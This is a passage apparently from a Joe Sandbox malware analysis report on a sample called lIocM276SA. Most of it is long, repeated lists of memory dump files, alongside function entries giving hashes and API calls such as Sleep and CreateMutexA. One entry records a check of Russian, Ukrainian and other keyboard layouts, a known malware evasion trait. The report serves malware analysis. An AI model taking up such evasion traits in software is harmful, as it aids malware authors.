Associated: 00000000.00000002.1699843835.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699858423.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699875940.0000000000565000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699890391.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699917003.0000000000570000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699930565.0000000000571000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699930565.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699969682.00000000005A6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699983927.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700000371.00000000005C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700014015.00000000005C1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700028129.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700041553.00000000005C8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700056335.00000000005D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700069523.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_lIocM276SA.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: dcbae8f99685d81bc33c9e7ff08413b5b4a420497c2fb1f80cc42cb09031f542
Instruction ID: 13191237e85bb4915e5ce120932ad767279decbf396b40e2bc93125de03d3eab
Opcode Fuzzy Hash: dcbae8f99685d81bc33c9e7ff08413b5b4a420497c2fb1f80cc42cb09031f542
Instruction Fuzzy Hash: 0CF1CF709102589BEB24DF54CC85BDEBBB9EB44304F5042A9F518A72C1DBB4AE98CF94

Function 002D9BA5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 002DA963
CreateMutexA.KERNEL32(00000000,00000000,00333254), ref: 002DA981

Strings

T23, xrefs: 002DA970

Memory Dump Source

Source File: 00000000.00000002.1696962631.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1696928589.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696962631.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697483923.0000000000339000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697575753.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698107466.0000000000345000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698145968.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698168842.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698394305.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698414003.000000000049D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698530610.00000000004B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698530610.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698578576.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698993165.00000000004C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011760.00000000004C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699032395.00000000004C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699117800.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699138916.00000000004F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699321096.00000000004F7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699375451.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699403454.0000000000515000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699595666.0000000000517000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699639765.0000000000518000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699655740.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699692138.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699709413.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699726186.000000000052C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699739671.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699753606.0000000000537000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699767147.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699782980.000000000053C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699800362.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699815824.0000000000549000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699830156.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699843835.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699858423.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699875940.0000000000565000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699890391.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699917003.0000000000570000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699930565.0000000000571000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699930565.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699969682.00000000005A6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699983927.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700000371.00000000005C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700014015.00000000005C1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700028129.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700041553.00000000005C8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700056335.00000000005D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700069523.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_lIocM276SA.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T23
API String ID: 1464230837-3327420953
Opcode ID: 271ca29283791226c1be73182e57de2db67b5bd2741b6de96130936b025ef595
Instruction ID: d7bac17b582e0271d7db2f60209405fbf4e0f9ca018a220ccb41ba138d2091e4
Opcode Fuzzy Hash: 271ca29283791226c1be73182e57de2db67b5bd2741b6de96130936b025ef595
Instruction Fuzzy Hash: B13146317242008BEB08EB78DC89BADBBA6EB86314F24821AF014973D5C7759DE58761

Function 002D9F44 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 002DA963
CreateMutexA.KERNEL32(00000000,00000000,00333254), ref: 002DA981

Strings

T23, xrefs: 002DA970

Memory Dump Source

Source File: 00000000.00000002.1696962631.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1696928589.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696962631.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697483923.0000000000339000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697575753.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698107466.0000000000345000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698145968.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698168842.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698394305.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698414003.000000000049D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698530610.00000000004B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698530610.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698578576.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698993165.00000000004C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011760.00000000004C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699032395.00000000004C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699117800.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699138916.00000000004F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699321096.00000000004F7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699375451.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699403454.0000000000515000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699595666.0000000000517000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699639765.0000000000518000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699655740.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699692138.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699709413.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699726186.000000000052C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699739671.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699753606.0000000000537000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699767147.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699782980.000000000053C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699800362.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699815824.0000000000549000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699830156.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699843835.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699858423.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699875940.0000000000565000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699890391.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699917003.0000000000570000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699930565.0000000000571000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699930565.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699969682.00000000005A6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699983927.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700000371.00000000005C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700014015.00000000005C1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700028129.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700041553.00000000005C8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700056335.00000000005D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700069523.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_lIocM276SA.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T23
API String ID: 1464230837-3327420953
Opcode ID: 7d35a4b80f7488ec59b350367b34c25d6ed10049045ac3ec70e9f88b903716ec
Instruction ID: b86091f00c7c5eb98502cd1fad665e3cb9458b32a96cc8172f90c45e41a4b8fe
Opcode Fuzzy Hash: 7d35a4b80f7488ec59b350367b34c25d6ed10049045ac3ec70e9f88b903716ec
Instruction Fuzzy Hash: FD3166317242008FEB08AB78D894BADB766EB86310F24861AF014D73D1C7759DA08762

Function 002DA079 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 002DA963
CreateMutexA.KERNEL32(00000000,00000000,00333254), ref: 002DA981

Strings

T23, xrefs: 002DA970

Memory Dump Source

Source File: 00000000.00000002.1696962631.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1696928589.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696962631.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697483923.0000000000339000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697575753.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698107466.0000000000345000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698145968.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698168842.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698394305.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698414003.000000000049D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698530610.00000000004B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698530610.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698578576.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698993165.00000000004C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011760.00000000004C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699032395.00000000004C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699117800.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699138916.00000000004F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699321096.00000000004F7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699375451.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699403454.0000000000515000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699595666.0000000000517000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699639765.0000000000518000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699655740.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699692138.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699709413.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699726186.000000000052C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699739671.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699753606.0000000000537000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699767147.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699782980.000000000053C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699800362.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699815824.0000000000549000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699830156.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699843835.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699858423.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699875940.0000000000565000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699890391.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699917003.0000000000570000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699930565.0000000000571000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699930565.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699969682.00000000005A6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699983927.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700000371.00000000005C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700014015.00000000005C1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700028129.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700041553.00000000005C8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700056335.00000000005D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700069523.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_lIocM276SA.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T23
API String ID: 1464230837-3327420953
Opcode ID: 16375be610f448e0faac80982f3dad46f69cba6e345db9b4a201e808c5821029
Instruction ID: b5cadfbb316187c40724a6f9421a7b1f3599aedc04edaa779542b138c2f79f3c
Opcode Fuzzy Hash: 16375be610f448e0faac80982f3dad46f69cba6e345db9b4a201e808c5821029
Instruction Fuzzy Hash: 103146317242409BEB08EB78DC85FADB766EB82314F24861AE014D73D1C7769DA48662

Function 002DA1AE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 002DA963
CreateMutexA.KERNEL32(00000000,00000000,00333254), ref: 002DA981

Strings

T23, xrefs: 002DA970

Memory Dump Source

Source File: 00000000.00000002.1696962631.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1696928589.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696962631.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697483923.0000000000339000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697575753.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698107466.0000000000345000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698145968.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698168842.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698394305.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698414003.000000000049D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698530610.00000000004B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698530610.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698578576.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698993165.00000000004C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011760.00000000004C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699032395.00000000004C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699117800.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699138916.00000000004F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699321096.00000000004F7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699375451.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699403454.0000000000515000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699595666.0000000000517000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699639765.0000000000518000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699655740.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699692138.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699709413.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699726186.000000000052C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699739671.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699753606.0000000000537000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699767147.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699782980.000000000053C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699800362.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699815824.0000000000549000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699830156.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699843835.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699858423.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699875940.0000000000565000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699890391.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699917003.0000000000570000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699930565.0000000000571000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699930565.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699969682.00000000005A6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699983927.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700000371.00000000005C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700014015.00000000005C1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700028129.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700041553.00000000005C8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700056335.00000000005D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1700069523.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_lIocM276SA.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T23
API String ID: 1464230837-3327420953
Opcode ID: f3790b19989908dedd6de1a98fb600a07d7cc02fd98751ad9b7d1f46a116e182
Instruction ID: 357ad30ec2f7b86277919d37ba2f1e3bb2857ff86142d24a55694fc546740922
Opcode Fuzzy Hash: f3790b19989908dedd6de1a98fb600a07d7cc02fd98751ad9b7d1f46a116e182
Instruction Fuzzy Hash: D93148317242409BFB08AB78DC89FADB766EF86310F24461AE414973D1C7769DA48762

Function 002DA418 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 002DA963
CreateMutexA.KERNEL32(00000000,00000000,00333254), ref: 002DA981

Strings

T23, xrefs: 002DA970

Memory Dump Source

Source File: 00000000.00000002.1696962631.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1696928589.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696962631.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697483923.0000000000339000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697575753.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698107466.0000000000345000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698145968.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698168842.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698394305.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698414003.000000000049D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698530610.00000000004B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698530610.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698578576.00000000004C0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698993165.00000000004C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011760.00000000004C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699032395.00000000004C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699117800.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699138916.00000000004F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699321096.00000000004F7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699375451.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699403454.0000000000515000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699595666.0000000000517000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699639765.0000000000518000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699655740.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699692138.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699709413.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699726186.000000000052C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699739671.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699753606.0000000000537000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699767147.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699782980.000000000053C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699800362.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699815824.0000000000549000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699830156.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699843835.000000000054B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699858423.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
